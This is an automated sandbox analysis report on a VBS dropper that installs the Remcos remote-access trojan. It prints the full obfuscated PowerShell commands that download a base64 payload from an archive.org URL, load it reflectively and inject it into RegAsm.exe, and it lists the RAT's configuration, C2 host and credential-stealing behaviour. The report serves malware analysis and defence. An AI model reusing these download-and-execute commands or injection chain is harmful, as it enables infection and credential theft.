Analysis

  • max time kernel
    149s
  • max time network
    138s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12-09-2024 12:24

General

  • Target

    0x000300000000b3e3-94.vbs

  • Size

    194KB

  • MD5

    914253e6225b686ee3e0a752c1cd1bb4

  • SHA1

    42e9ae719f4dfd04e7dcb9d58a911eb37fd3439c

  • SHA256

    00f52a2f56551d868397acd11e4d12c353d7107ce680c6ff00012a90dabc818b

  • SHA512

    92ecf4249ef488d95a657a3e920316cc816e2e8d5d2b8e257e4ce074626beda95d379034c86758ac7a1623354cfe2cba14bf811f73f3a35fe97e3610d85c9e3b

  • SSDEEP

    3072:7tduXlp2G4E2A0w8Vf0DyQPrWDgt5pUGw1piL71OkHiMZzvcqgp3yO9pj2t7tK:JW2Gp9b8tPQPacR9vctpiO9pjGtK

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt

exe.dropper

https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt

Extracted

Family

remcos

Botnet

RemoteHost

C2

ugnrv.duckdns.org:9674

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-AV5HSI

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Detected Nirsoft tools 3 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 37 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0x000300000000b3e3-94.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:468
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J⛮ ䷖ ⧉ ┕ ⽚B1⛮ ䷖ ⧉ ┕ ⽚HI⛮ ䷖ ⧉ ┕ ⽚b⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚g⛮ ䷖ ⧉ ┕ ⽚D0⛮ ䷖ ⧉ ┕ ⽚I⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚n⛮ ䷖ ⧉ ┕ ⽚Gg⛮ ䷖ ⧉ ┕ ⽚d⛮ ䷖ ⧉ ┕ ⽚B0⛮ ䷖ ⧉ ┕ ⽚H⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚cw⛮ ䷖ ⧉ ┕ ⽚6⛮ ䷖ ⧉ ┕ ⽚C8⛮ ䷖ ⧉ ┕ ⽚LwBp⛮ ䷖ ⧉ ┕ ⽚GE⛮ ䷖ ⧉ ┕ ⽚Ng⛮ ䷖ ⧉ ┕ ⽚w⛮ ䷖ ⧉ ┕ ⽚D⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚MQ⛮ ䷖ ⧉ ┕ ⽚w⛮ ䷖ ⧉ ┕ ⽚D⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚LgB1⛮ ䷖ ⧉ ┕ ⽚HM⛮ ䷖ ⧉ ┕ ⽚LgBh⛮ ䷖ ⧉ ┕ ⽚HI⛮ ䷖ ⧉ ┕ ⽚YwBo⛮ ䷖ ⧉ ┕ ⽚Gk⛮ ䷖ ⧉ ┕ ⽚dgBl⛮ ䷖ ⧉ ┕ ⽚C4⛮ ䷖ ⧉ ┕ ⽚bwBy⛮ ䷖ ⧉ ┕ ⽚Gc⛮ ䷖ ⧉ ┕ ⽚Lw⛮ ䷖ ⧉ ┕ ⽚y⛮ ䷖ ⧉ ┕ ⽚DQ⛮ ䷖ ⧉ ┕ ⽚LwBp⛮ ䷖ ⧉ ┕ ⽚HQ⛮ ䷖ ⧉ ┕ ⽚ZQBt⛮ ䷖ ⧉ ┕ ⽚HM⛮ ䷖ ⧉ ┕ ⽚LwBk⛮ ䷖ ⧉ ┕ ⽚GU⛮ ䷖ ⧉ ┕ ⽚d⛮ ䷖ ⧉ ┕ ⽚Bh⛮ ䷖ ⧉ ┕ ⽚Gg⛮ ䷖ ⧉ ┕ ⽚LQBu⛮ ䷖ ⧉ ┕ ⽚G8⛮ ䷖ ⧉ ┕ ⽚d⛮ ䷖ ⧉ ┕ ⽚Bl⛮ ䷖ ⧉ ┕ ⽚C0⛮ ䷖ ⧉ ┕ ⽚dg⛮ ䷖ ⧉ ┕ ⽚v⛮ ䷖ ⧉ ┕ ⽚EQ⛮ ䷖ ⧉ ┕ ⽚ZQB0⛮ ䷖ ⧉ ┕ ⽚GE⛮ ䷖ ⧉ ┕ ⽚a⛮ ䷖ ⧉ ┕ ⽚BO⛮ ䷖ ⧉ ┕ ⽚G8⛮ ䷖ ⧉ ┕ ⽚d⛮ ䷖ ⧉ ┕ ⽚Bl⛮ ䷖ ⧉ ┕ ⽚FY⛮ ䷖ ⧉ ┕ ⽚LgB0⛮ ䷖ ⧉ ┕ ⽚Hg⛮ ䷖ ⧉ ┕ ⽚d⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚n⛮ ䷖ ⧉ ┕ ⽚Ds⛮ ䷖ ⧉ ┕ ⽚J⛮ ䷖ ⧉ ┕ ⽚Bi⛮ ䷖ ⧉ ┕ ⽚GE⛮ ䷖ ⧉ ┕ ⽚cwBl⛮ ䷖ ⧉ ┕ ⽚DY⛮ ䷖ ⧉ ┕ ⽚N⛮ ䷖ ⧉ ┕ ⽚BD⛮ ䷖ ⧉ ┕ ⽚G8⛮ ䷖ ⧉ ┕ ⽚bgB0⛮ ䷖ ⧉ ┕ ⽚GU⛮ ䷖ ⧉ ┕ ⽚bgB0⛮ ䷖ ⧉ ┕ ⽚C⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚PQ⛮ ䷖ ⧉ ┕ ⽚g⛮ ䷖ ⧉ ┕ ⽚Cg⛮ ䷖ ⧉ ┕ ⽚TgBl⛮ ䷖ ⧉ ┕ ⽚Hc⛮ ䷖ ⧉ ┕ ⽚LQBP⛮ ䷖ ⧉ ┕ ⽚GI⛮ ䷖ ⧉ ┕ ⽚agBl⛮ ䷖ ⧉ ┕ ⽚GM⛮ ䷖ ⧉ ┕ ⽚d⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚g⛮ ䷖ ⧉ ┕ ⽚FM⛮ ䷖ ⧉ ┕ ⽚eQBz⛮ ䷖ ⧉ ┕ ⽚HQ⛮ ䷖ ⧉ ┕ ⽚ZQBt⛮ ䷖ ⧉ ┕ ⽚C4⛮ ䷖ ⧉ ┕ ⽚TgBl⛮ ䷖ ⧉ ┕ ⽚HQ⛮ ䷖ ⧉ ┕ ⽚LgBX⛮ ䷖ ⧉ ┕ ⽚GU⛮ ䷖ ⧉ ┕ ⽚YgBD⛮ ䷖ ⧉ ┕ ⽚Gw⛮ ䷖ ⧉ ┕ ⽚aQBl⛮ ䷖ ⧉ ┕ ⽚G4⛮ ䷖ ⧉ ┕ ⽚d⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚p⛮ ䷖ ⧉ ┕ ⽚C4⛮ ䷖ ⧉ ┕ ⽚R⛮ ䷖ ⧉ ┕ ⽚Bv⛮ ䷖ ⧉ ┕ ⽚Hc⛮ ䷖ ⧉ ┕ ⽚bgBs⛮ ䷖ ⧉ ┕ ⽚G8⛮ ䷖ ⧉ ┕ ⽚YQBk⛮ ䷖ ⧉ ┕ ⽚FM⛮ ䷖ ⧉ ┕ ⽚d⛮ ䷖ ⧉ ┕ ⽚By⛮ ䷖ ⧉ ┕ ⽚Gk⛮ ䷖ ⧉ ┕ ⽚bgBn⛮ ䷖ ⧉ ┕ ⽚Cg⛮ ䷖ ⧉ ┕ ⽚J⛮ ䷖ ⧉ ┕ ⽚B1⛮ ䷖ ⧉ ┕ ⽚HI⛮ ䷖ ⧉ ┕ ⽚b⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚p⛮ ䷖ ⧉ ┕ ⽚Ds⛮ ䷖ ⧉ ┕ ⽚J⛮ ䷖ ⧉ ┕ ⽚Bi⛮ ䷖ ⧉ ┕ ⽚Gk⛮ ䷖ ⧉ ┕ ⽚bgBh⛮ ䷖ ⧉ ┕ ⽚HI⛮ ䷖ ⧉ ┕ ⽚eQBD⛮ ䷖ ⧉ ┕ ⽚G8⛮ ䷖ ⧉ ┕ ⽚bgB0⛮ ䷖ ⧉ ┕ ⽚GU⛮ ䷖ ⧉ ┕ ⽚bgB0⛮ ䷖ ⧉ ┕ ⽚C⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚PQ⛮ ䷖ ⧉ ┕ ⽚g⛮ ䷖ ⧉ ┕ ⽚Fs⛮ ䷖ ⧉ ┕ ⽚UwB5⛮ ䷖ ⧉ ┕ ⽚HM⛮ ䷖ ⧉ ┕ ⽚d⛮ ䷖ ⧉ ┕ ⽚Bl⛮ ䷖ ⧉ ┕ ⽚G0⛮ ䷖ ⧉ ┕ ⽚LgBD⛮ ䷖ ⧉ ┕ ⽚G8⛮ ䷖ ⧉ ┕ ⽚bgB2⛮ ䷖ ⧉ ┕ ⽚GU⛮ ䷖ ⧉ ┕ ⽚cgB0⛮ ䷖ ⧉ ┕ ⽚F0⛮ ䷖ ⧉ ┕ ⽚Og⛮ ䷖ ⧉ ┕ ⽚6⛮ ䷖ ⧉ ┕ ⽚EY⛮ ䷖ ⧉ ┕ ⽚cgBv⛮ ䷖ ⧉ ┕ ⽚G0⛮ ䷖ ⧉ ┕ ⽚QgBh⛮ ䷖ ⧉ ┕ ⽚HM⛮ ䷖ ⧉ ┕ ⽚ZQ⛮ ䷖ ⧉ ┕ ⽚2⛮ ䷖ ⧉ ┕ ⽚DQ⛮ ䷖ ⧉ ┕ ⽚UwB0⛮ ䷖ ⧉ ┕ ⽚HI⛮ ䷖ ⧉ ┕ ⽚aQBu⛮ ䷖ ⧉ ┕ ⽚Gc⛮ ䷖ ⧉ ┕ ⽚K⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚k⛮ ䷖ ⧉ ┕ ⽚GI⛮ ䷖ ⧉ ┕ ⽚YQBz⛮ ䷖ ⧉ ┕ ⽚GU⛮ ䷖ ⧉ ┕ ⽚Ng⛮ ䷖ ⧉ ┕ ⽚0⛮ ䷖ ⧉ ┕ ⽚EM⛮ ䷖ ⧉ ┕ ⽚bwBu⛮ ䷖ ⧉ ┕ ⽚HQ⛮ ䷖ ⧉ ┕ ⽚ZQBu⛮ ䷖ ⧉ ┕ ⽚HQ⛮ ䷖ ⧉ ┕ ⽚KQ⛮ ䷖ ⧉ ┕ ⽚7⛮ ䷖ ⧉ ┕ ⽚CQ⛮ ䷖ ⧉ ┕ ⽚YQBz⛮ ䷖ ⧉ ┕ ⽚HM⛮ ䷖ ⧉ ┕ ⽚ZQBt⛮ ䷖ ⧉ ┕ ⽚GI⛮ ䷖ ⧉ ┕ ⽚b⛮ ䷖ ⧉ ┕ ⽚B5⛮ ䷖ ⧉ ┕ ⽚C⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚PQ⛮ ䷖ ⧉ ┕ ⽚g⛮ ䷖ ⧉ ┕ ⽚Fs⛮ ䷖ ⧉ ┕ ⽚UgBl⛮ ䷖ ⧉ ┕ ⽚GY⛮ ䷖ ⧉ ┕ ⽚b⛮ ䷖ ⧉ ┕ ⽚Bl⛮ ䷖ ⧉ ┕ ⽚GM⛮ ䷖ ⧉ ┕ ⽚d⛮ ䷖ ⧉ ┕ ⽚Bp⛮ ䷖ ⧉ ┕ ⽚G8⛮ ䷖ ⧉ ┕ ⽚bg⛮ ䷖ ⧉ ┕ ⽚u⛮ ䷖ ⧉ ┕ ⽚EE⛮ ䷖ ⧉ ┕ ⽚cwBz⛮ ䷖ ⧉ ┕ ⽚GU⛮ ䷖ ⧉ ┕ ⽚bQBi⛮ ䷖ ⧉ ┕ ⽚Gw⛮ ䷖ ⧉ ┕ ⽚eQBd⛮ ䷖ ⧉ ┕ ⽚Do⛮ ䷖ ⧉ ┕ ⽚OgBM⛮ ䷖ ⧉ ┕ ⽚G8⛮ ䷖ ⧉ ┕ ⽚YQBk⛮ ䷖ ⧉ ┕ ⽚Cg⛮ ䷖ ⧉ ┕ ⽚J⛮ ䷖ ⧉ ┕ ⽚Bi⛮ ䷖ ⧉ ┕ ⽚Gk⛮ ䷖ ⧉ ┕ ⽚bgBh⛮ ䷖ ⧉ ┕ ⽚HI⛮ ䷖ ⧉ ┕ ⽚eQBD⛮ ䷖ ⧉ ┕ ⽚G8⛮ ䷖ ⧉ ┕ ⽚bgB0⛮ ䷖ ⧉ ┕ ⽚GU⛮ ䷖ ⧉ ┕ ⽚bgB0⛮ ䷖ ⧉ ┕ ⽚Ck⛮ ䷖ ⧉ ┕ ⽚Ow⛮ ䷖ ⧉ ┕ ⽚k⛮ ䷖ ⧉ ┕ ⽚HQ⛮ ䷖ ⧉ ┕ ⽚eQBw⛮ ䷖ ⧉ ┕ ⽚GU⛮ ䷖ ⧉ ┕ ⽚I⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚9⛮ ䷖ ⧉ ┕ ⽚C⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚J⛮ ䷖ ⧉ ┕ ⽚Bh⛮ ䷖ ⧉ ┕ ⽚HM⛮ ䷖ ⧉ ┕ ⽚cwBl⛮ ䷖ ⧉ ┕ ⽚G0⛮ ䷖ ⧉ ┕ ⽚YgBs⛮ ䷖ ⧉ ┕ ⽚Hk⛮ ䷖ ⧉ ┕ ⽚LgBH⛮ ䷖ ⧉ ┕ ⽚GU⛮ ䷖ ⧉ ┕ ⽚d⛮ ䷖ ⧉ ┕ ⽚BU⛮ ䷖ ⧉ ┕ ⽚Hk⛮ ䷖ ⧉ ┕ ⽚c⛮ ䷖ ⧉ ┕ ⽚Bl⛮ ䷖ ⧉ ┕ ⽚Cg⛮ ䷖ ⧉ ┕ ⽚JwBS⛮ ䷖ ⧉ ┕ ⽚HU⛮ ䷖ ⧉ ┕ ⽚bgBQ⛮ ䷖ ⧉ ┕ ⽚EU⛮ ䷖ ⧉ ┕ ⽚LgBI⛮ ䷖ ⧉ ┕ ⽚G8⛮ ䷖ ⧉ ┕ ⽚bQBl⛮ ䷖ ⧉ ┕ ⽚Cc⛮ ䷖ ⧉ ┕ ⽚KQ⛮ ䷖ ⧉ ┕ ⽚7⛮ ䷖ ⧉ ┕ ⽚CQ⛮ ䷖ ⧉ ┕ ⽚bQBl⛮ ䷖ ⧉ ┕ ⽚HQ⛮ ䷖ ⧉ ┕ ⽚a⛮ ䷖ ⧉ ┕ ⽚Bv⛮ ䷖ ⧉ ┕ ⽚GQ⛮ ䷖ ⧉ ┕ ⽚I⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚9⛮ ䷖ ⧉ ┕ ⽚C⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚J⛮ ䷖ ⧉ ┕ ⽚B0⛮ ䷖ ⧉ ┕ ⽚Hk⛮ ䷖ ⧉ ┕ ⽚c⛮ ䷖ ⧉ ┕ ⽚Bl⛮ ䷖ ⧉ ┕ ⽚C4⛮ ䷖ ⧉ ┕ ⽚RwBl⛮ ䷖ ⧉ ┕ ⽚HQ⛮ ䷖ ⧉ ┕ ⽚TQBl⛮ ䷖ ⧉ ┕ ⽚HQ⛮ ䷖ ⧉ ┕ ⽚a⛮ ䷖ ⧉ ┕ ⽚Bv⛮ ䷖ ⧉ ┕ ⽚GQ⛮ ䷖ ⧉ ┕ ⽚K⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚n⛮ ䷖ ⧉ ┕ ⽚FY⛮ ䷖ ⧉ ┕ ⽚QQBJ⛮ ䷖ ⧉ ┕ ⽚Cc⛮ ䷖ ⧉ ┕ ⽚KQ⛮ ䷖ ⧉ ┕ ⽚7⛮ ䷖ ⧉ ┕ ⽚CQ⛮ ䷖ ⧉ ┕ ⽚bQBl⛮ ䷖ ⧉ ┕ ⽚HQ⛮ ䷖ ⧉ ┕ ⽚a⛮ ䷖ ⧉ ┕ ⽚Bv⛮ ䷖ ⧉ ┕ ⽚GQ⛮ ䷖ ⧉ ┕ ⽚LgBJ⛮ ䷖ ⧉ ┕ ⽚G4⛮ ䷖ ⧉ ┕ ⽚dgBv⛮ ䷖ ⧉ ┕ ⽚Gs⛮ ䷖ ⧉ ┕ ⽚ZQ⛮ ䷖ ⧉ ┕ ⽚o⛮ ䷖ ⧉ ┕ ⽚CQ⛮ ䷖ ⧉ ┕ ⽚bgB1⛮ ䷖ ⧉ ┕ ⽚Gw⛮ ䷖ ⧉ ┕ ⽚b⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚s⛮ ䷖ ⧉ ┕ ⽚C⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚WwBv⛮ ䷖ ⧉ ┕ ⽚GI⛮ ䷖ ⧉ ┕ ⽚agBl⛮ ䷖ ⧉ ┕ ⽚GM⛮ ䷖ ⧉ ┕ ⽚d⛮ ䷖ ⧉ ┕ ⽚Bb⛮ ䷖ ⧉ ┕ ⽚F0⛮ ䷖ ⧉ ┕ ⽚XQB⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚Cg⛮ ䷖ ⧉ ┕ ⽚JwB0⛮ ䷖ ⧉ ┕ ⽚Hg⛮ ䷖ ⧉ ┕ ⽚d⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚u⛮ ䷖ ⧉ ┕ ⽚EM⛮ ䷖ ⧉ ┕ ⽚RgBD⛮ ䷖ ⧉ ┕ ⽚E4⛮ ䷖ ⧉ ┕ ⽚Ug⛮ ䷖ ⧉ ┕ ⽚v⛮ ䷖ ⧉ ┕ ⽚DM⛮ ䷖ ⧉ ┕ ⽚O⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚v⛮ ䷖ ⧉ ┕ ⽚DE⛮ ䷖ ⧉ ┕ ⽚Nw⛮ ䷖ ⧉ ┕ ⽚x⛮ ䷖ ⧉ ┕ ⽚C4⛮ ䷖ ⧉ ┕ ⽚MQ⛮ ䷖ ⧉ ┕ ⽚4⛮ ䷖ ⧉ ┕ ⽚C4⛮ ䷖ ⧉ ┕ ⽚Mg⛮ ䷖ ⧉ ┕ ⽚x⛮ ䷖ ⧉ ┕ ⽚C4⛮ ䷖ ⧉ ┕ ⽚O⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚5⛮ ䷖ ⧉ ┕ ⽚DE⛮ ䷖ ⧉ ┕ ⽚Lw⛮ ䷖ ⧉ ┕ ⽚v⛮ ䷖ ⧉ ┕ ⽚Do⛮ ䷖ ⧉ ┕ ⽚c⛮ ䷖ ⧉ ┕ ⽚B0⛮ ䷖ ⧉ ┕ ⽚HQ⛮ ䷖ ⧉ ┕ ⽚a⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚n⛮ ䷖ ⧉ ┕ ⽚C⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚L⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚g⛮ ䷖ ⧉ ┕ ⽚Cc⛮ ䷖ ⧉ ┕ ⽚Z⛮ ䷖ ⧉ ┕ ⽚Bl⛮ ䷖ ⧉ ┕ ⽚HM⛮ ䷖ ⧉ ┕ ⽚YQB0⛮ ䷖ ⧉ ┕ ⽚Gk⛮ ䷖ ⧉ ┕ ⽚dgBh⛮ ䷖ ⧉ ┕ ⽚GQ⛮ ䷖ ⧉ ┕ ⽚bw⛮ ䷖ ⧉ ┕ ⽚n⛮ ䷖ ⧉ ┕ ⽚C⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚L⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚g⛮ ䷖ ⧉ ┕ ⽚Cc⛮ ䷖ ⧉ ┕ ⽚Z⛮ ䷖ ⧉ ┕ ⽚Bl⛮ ䷖ ⧉ ┕ ⽚HM⛮ ䷖ ⧉ ┕ ⽚YQB0⛮ ䷖ ⧉ ┕ ⽚Gk⛮ ䷖ ⧉ ┕ ⽚dgBh⛮ ䷖ ⧉ ┕ ⽚GQ⛮ ䷖ ⧉ ┕ ⽚bw⛮ ䷖ ⧉ ┕ ⽚n⛮ ䷖ ⧉ ┕ ⽚C⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚L⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚g⛮ ䷖ ⧉ ┕ ⽚Cc⛮ ䷖ ⧉ ┕ ⽚Z⛮ ䷖ ⧉ ┕ ⽚Bl⛮ ䷖ ⧉ ┕ ⽚HM⛮ ䷖ ⧉ ┕ ⽚YQB0⛮ ䷖ ⧉ ┕ ⽚Gk⛮ ䷖ ⧉ ┕ ⽚dgBh⛮ ䷖ ⧉ ┕ ⽚GQ⛮ ䷖ ⧉ ┕ ⽚bw⛮ ䷖ ⧉ ┕ ⽚n⛮ ䷖ ⧉ ┕ ⽚Cw⛮ ䷖ ⧉ ┕ ⽚JwBS⛮ ䷖ ⧉ ┕ ⽚GU⛮ ䷖ ⧉ ┕ ⽚ZwBB⛮ ䷖ ⧉ ┕ ⽚HM⛮ ䷖ ⧉ ┕ ⽚bQ⛮ ䷖ ⧉ ┕ ⽚n⛮ ䷖ ⧉ ┕ ⽚Cw⛮ ䷖ ⧉ ┕ ⽚Jw⛮ ䷖ ⧉ ┕ ⽚n⛮ ䷖ ⧉ ┕ ⽚Ck⛮ ䷖ ⧉ ┕ ⽚KQ⛮ ䷖ ⧉ ┕ ⽚=';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('⛮ ䷖ ⧉ ┕ ⽚','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2448
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$url = 'https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt';$base64Content = (New-Object System.Net.WebClient).DownloadString($url);$binaryContent = [System.Convert]::FromBase64String($base64Content);$assembly = [Reflection.Assembly]::Load($binaryContent);$type = $assembly.GetType('RunPE.Home');$method = $type.GetMethod('VAI');$method.Invoke($null, [object[]]@('txt.CFCNR/38/171.18.21.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2188
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          4⤵
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:1360
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\zjawkgwdvgkewqydqyhrfmlqxluwqkta"
            5⤵
              PID:2476
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\zjawkgwdvgkewqydqyhrfmlqxluwqkta"
              5⤵
                PID:4876
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\zjawkgwdvgkewqydqyhrfmlqxluwqkta"
                5⤵
                  PID:3096
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\zjawkgwdvgkewqydqyhrfmlqxluwqkta"
                  5⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4140
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\begp"
                  5⤵
                  • Accesses Microsoft Outlook accounts
                  • System Location Discovery: System Language Discovery
                  PID:2940
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\mgliljr"
                  5⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2392

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

          Filesize

          3KB

          MD5

          f41839a3fe2888c8b3050197bc9a0a05

          SHA1

          0798941aaf7a53a11ea9ed589752890aee069729

          SHA256

          224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

          SHA512

          2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          64B

          MD5

          7274a07d1b80de6f66290b47588cee3b

          SHA1

          d926b384806c755fe6b9d03f68852765aabb5703

          SHA256

          5eba7517357473e4d5d7ede75c3768069c578d2b0023473fd67f76b373430de8

          SHA512

          b7813fea9091298d48c87b259b0d4473ddc4480667f82ed6b5f8bdfa600590dcbfb1d62cbaca649dcf321d85cb786bf62d48826ab04297a22b7c88439b94bcf3

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_koghafto.yag.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Local\Temp\zjawkgwdvgkewqydqyhrfmlqxluwqkta

          Filesize

          4KB

          MD5

          18db1829b27eaeed163c211f5d179d72

          SHA1

          4442332494cba1e012f8876ecac42126ba995bc6

          SHA256

          610c5ee3f0e63441521d26bc477c9618a4c5f86e93d31b31890680c69e3ecc3d

          SHA512

          123d68b2c84f7a52d15faa212c06f33b04a55585e2aeb16bb14df95b18c0bcf31933e5bf0c736c90bc054b9527fccb046540d3302a0f149ebeed7c6bcca0b986

        • memory/1360-42-0x0000000000400000-0x0000000000482000-memory.dmp

          Filesize

